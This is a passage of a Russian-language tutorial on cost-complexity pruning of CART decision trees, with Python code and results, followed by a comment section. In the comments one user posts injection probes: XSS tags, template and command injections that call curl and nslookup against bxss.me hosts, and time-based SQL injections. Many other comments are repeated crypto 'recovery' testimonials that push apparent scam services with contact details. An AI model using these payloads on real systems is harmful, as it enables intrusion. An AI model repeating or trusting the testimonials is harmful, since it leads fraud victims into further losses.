                                                                                                                                                        'virginica error_rate '
                                                                                                                                                        '0.018532818532818515']}]}
ecd32db3e767594cb89451b7a056ece9.png
our tree pruning accuracy: before 0.9777777777777777 -> after 0.9777777777777777
sklearn tree pruning accuracy: before 0.9777777777777777 -> after 0.9777777777777777

Визуализация решающих границ до и после прунинга

feature_indexes = [2, 3]
title1 = 'Classification tree surface before pruning'
decision_boundary_plot(X1, y1, X1_train, y1_train, sk_tree_classifier, feature_indexes, title1)
9685bb39817a4c79832ffc7d58931adb.png
feature_indexes = [2, 3]
title2 = 'Classification tree surface after pruning'
decision_boundary_plot(X1, y1, X1_train, y1_train, best_sk_tree_classifier, feature_indexes, title2)
d306d08d6cece8361e15a528899f49cd.png
feature_indexes = [2, 3]
plt.figure(figsize=(10, 15))

for i, alpha in enumerate(clf_ccp_alphas):
    sk_tree_clf = DecisionTreeClassifier(random_state=0, ccp_alpha=alpha)
    plt.subplot(3, 2, i + 1)
    plt.subplots_adjust(hspace=0.5)
    title = f'ccp_alpha = {alpha}'
    decision_boundary_plot(X1, y1, X1_train, y1_train, sk_tree_clf, feature_indexes, title)
Прунинг при всех полученных alpha ccp
Прунинг при всех полученных alpha ccp

Регрессия до прунинга

tree_regressor = DecisionTreeCART(regression=True)
tree_regressor.fit(X2_train, y2_train)
reg_ccp_alphas, _ = tree_regressor.cost_complexity_pruning_path(X2_train, y2_train)
reg_ccp_alphas = reg_ccp_alphas[:-1]

sk_tree_regressor = DecisionTreeRegressor(random_state=0)
sk_tree_regressor.fit(X2_train, y2_train)
sk_reg_path = sk_tree_regressor.cost_complexity_pruning_path(X2_train, y2_train)
sk_reg_ccp_alphas = sk_reg_path.ccp_alphas[:-1]

reg_estimator = DecisionTreeCART(regression=True)
sk_reg_estimator = DecisionTreeRegressor(random_state=0)
train2_data, test2_data = [X2_train, y2_train], [X2_test, y2_test]
metric = mean_absolute_percentage_error
labels = ['Alpha', 'MAPE']

pprint(tree_regressor.tree)
tree_plot(sk_tree_regressor, X2_train)

print(f'CART alphas: {reg_ccp_alphas}')
tree_scores_plot(reg_estimator, reg_ccp_alphas, train2_data, test2_data, metric, labels)
print(f'sklearn_alphas: {sk_reg_ccp_alphas}')
tree_scores_plot(sk_reg_estimator, sk_reg_ccp_alphas, train2_data, test2_data, metric, labels)


{'Jumps <= 90.5 | as_leaf 54.625 error_rate 29.359375': [{'Jumps <= 46.0 | as_leaf 52.90909090909091 error_rate 17.181818181818183': [{'Jumps <= 34.0 | as_leaf 54.857142857142854 error_rate 11.428571428571429': [{'Jumps <= 28.0 | as_leaf 50.0 error_rate 2.0': ['54.0 '
                                                                                                                                                                                                                                                                     '| '
                                                                                                                                                                                                                                                                     'error_rate '
                                                                                                                                                                                                                                                                     '0.0',
                                                                                                                                                                                                                                                                     '46.0 '
                                                                                                                                                                                                                                                                     '| '
                                                                                                                                                                                                                                                                     'error_rate '
                                                                                                                                                                                                                                                                     '0.0']},
                                                                                                                                                                                                                    {'Chins <= 14.5 | as_leaf 56.8 error_rate 5.3': [{'Situps <= 103.0 | as_leaf 58.5 error_rate 1.6875': ['56.0 '
                                                                                                                                                                                                                                                                                                                           '| '
                                                                                                                                                                                                                                                                                                                           'error_rate '
                                                                                                                                                                                                                                                                                                                           '0.0',
                                                                                                                                                                                                                                                                                                                           {'Jumps <= 38.5 | as_leaf 61.0 error_rate 0.125': ['62.0 '
                                                                                                                                                                                                                                                                                                                                                                              '| '
                                                                                                                                                                                                                                                                                                                                                                              'error_rate '
                                                                                                                                                                                                                                                                                                                                                                              '0.0',
                                                                                                                                                                                                                                                                                                                                                                              '60.0 '
                                                                                                                                                                                                                                                                                                                                                                              '| '
                                                                                                                                                                                                                                                                                                                                                                              'error_rate '
                                                                                                                                                                                                                                                                                                                                                                              '0.0']}]},
                                                                                                                                                                                                                                                                     '50.0 '
                                                                                                                                                                                                                                                                     '| '
                                                                                                                                                                                                                                                                     'error_rate '
                                                                                                                                                                                                                                                                     '0.0']}]},
                                                                                                                                      {'Chins <= 12.0 | as_leaf 49.5 error_rate 1.1875': [{'Jumps <= 70.0 | as_leaf 50.666666666666664 error_rate 0.16666666666666666': ['50.0 '
                                                                                                                                                                                                                                                                         '| '
                                                                                                                                                                                                                                                                         'error_rate '
                                                                                                                                                                                                                                                                         '0.0',
                                                                                                                                                                                                                                                                         '52.0 '
                                                                                                                                                                                                                                                                         '| '
                                                                                                                                                                                                                                                                         'error_rate '
                                                                                                                                                                                                                                                                         '0.0']},
                                                                                                                                                                                          '46.0 '
                                                                                                                                                                                          '| '
                                                                                                                                                                                          'error_rate '
                                                                                                                                                                                          '0.0']}]},
                                                         {'Jumps <= 110.0 | as_leaf 58.4 error_rate 5.7': [{'Jumps <= 103.0 | as_leaf 61.0 error_rate 1.125': ['58.0 '
                                                                                                                                                               '| '
                                                                                                                                                               'error_rate '
                                                                                                                                                               '0.0',
                                                                                                                                                               '64.0 '
                                                                                                                                                               '| '
                                                                                                                                                               'error_rate '
                                                                                                                                                               '0.0']},
                                                                                                           {'Chins <= 12.5 | as_leaf 56.666666666666664 error_rate 3.1666666666666665': ['62.0 '
                                                                                                                                                                                         '| '
                                                                                                                                                                                         'error_rate '
                                                                                                                                                                                         '0.0',
                                                                                                                                                                                         {'Jumps <= 182.5 | as_leaf 54.0 error_rate 0.5': ['52.0 '
                                                                                                                                                                                                                                           '| '
                                                                                                                                                                                                                                           'error_rate '
                                                                                                                                                                                                                                           '0.0',
                                                                                                                                                                                                                                           '56.0 '
                                                                                                                                                                                                                                           '| '
                                                                                                                                                                                                                                           'error_rate '
                                                                                                                                                                                                                                           '0.0']}]}]}]}
aafcd0df46c2293ea43064a7920ebf24.png
CART alphas: [0.         0.125      0.16666667 0.5        1.02083333 1.125
 1.5625     2.         2.0375     3.6125     4.12857143 4.56574675]
6dd0f98cdaf47e8bbfe31428f1efaf9e.png
sklearn_alphas: [0.         0.125      0.16666667 0.5        1.02083333 1.125
 1.5625     2.         2.0375     3.6125     4.12857143 4.56574675]
315a15d24ed26bad2558fbef53fe8184.png

Регрессия после прунинга

tree_reg_prediction = tree_regressor.predict(X2_test)
tree_reg_error = mean_absolute_percentage_error(tree_reg_prediction, y2_test)
sk_tree_reg_prediction = sk_tree_regressor.predict(X2_test)
sk_reg_error= mean_absolute_percentage_error(sk_tree_reg_prediction, y2_test)

best_reg_ccp_alpha = 3.613   # based on a plot
best_tree_regressor = DecisionTreeCART(ccp_alpha=best_reg_ccp_alpha, regression=True)
best_tree_regressor.fit(X2_train, y2_train)
best_tree_reg_prediction = best_tree_regressor.predict(X2_test)
lowest_tree_reg_error = mean_absolute_percentage_error(best_tree_reg_prediction, y2_test)

best_sk_tree_regressor = DecisionTreeRegressor(random_state=0, ccp_alpha=best_reg_ccp_alpha)
best_sk_tree_regressor.fit(X2_train, y2_train)
best_sk_tree_reg_prediction = best_sk_tree_regressor.predict(X2_test)
lowest_sk_reg_error = mean_absolute_percentage_error(best_sk_tree_reg_prediction, y2_test)

print('tree prediction', tree_reg_prediction, ' ', sep='\n')
print('sklearn prediction', sk_tree_reg_prediction, ' ', sep='\n')
print('best tree prediction', best_tree_reg_prediction, ' ', sep='\n')
print('best sklearn prediction', best_sk_tree_reg_prediction, ' ', sep='\n')

pprint(best_tree_regressor.tree)
tree_plot(best_sk_tree_regressor, X2_train)
print(f'tree error: before {tree_reg_error} -> after pruning {lowest_tree_reg_error}')
print(f'sklearn tree error: before {sk_reg_error} -> after pruning {lowest_sk_reg_error}')


tree prediction
[46. 50. 60. 50.]
 
sklearn prediction
[46. 50. 60. 50.]
 
best tree prediction
[49.5 49.5 56.8 56.8]
 
best sklearn prediction
[49.5 49.5 56.8 56.8]
 
{'Jumps <= 90.5 | as_leaf 54.625 error_rate 29.359375': [{'Jumps <= 46.0 | as_leaf 52.90909090909091 error_rate 17.181818181818183': [{'Jumps <= 34.0 | as_leaf 54.857142857142854 error_rate 11.428571428571429': ['50.0 '
                                                                                                                                                                                                                    'error_rate '
                                                                                                                                                                                                                    '2.0',
                                                                                                                                                                                                                    '56.8 '
                                                                                                                                                                                                                    'error_rate '
                                                                                                                                                                                                                    '5.3']},
                                                                                                                                      '49.5 '
                                                                                                                                      'error_rate '
                                                                                                                                      '1.1875']},
                                                         '58.4 error_rate 5.7']}
ceadb36d233fd9d10441f1d777b97f16.png
tree error: before 0.20681159420289855 -> after pruning 0.16035353535353536
sklearn tree error: before 0.20681159420289855 -> after pruning 0.1603535353535354

Преимущества и недостатки дерева решений

Преимущества:

  • простота в интерпретации и визуализации;

  • неплохая работа с нелинейными зависимостями в данных;

  • не требуется особой подготовки тренировочного набора;

  • относительно высокая скорость обучения и прогнозирования.

Недостатки:

  • поиск оптимального дерева является NP-полной задачей;

  • нестабильность работы даже при небольшом изменении данных;

  • возможность переобучения из-за чувствительности к шуму и выбросам в данных.

Дополнительные источники

Статья «The CART Decision Tree for Mining Data Streams», Leszek Rutkowskia, Maciej Jaworskia, Lena Pietruczuka, Piotr Dudaa.

Документация:

Лекции: один, два, три, четыре.

Пошаговое построение дерева решений: один, два, три.

Pruning:


Бэггинг и случайный лес 🡆

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

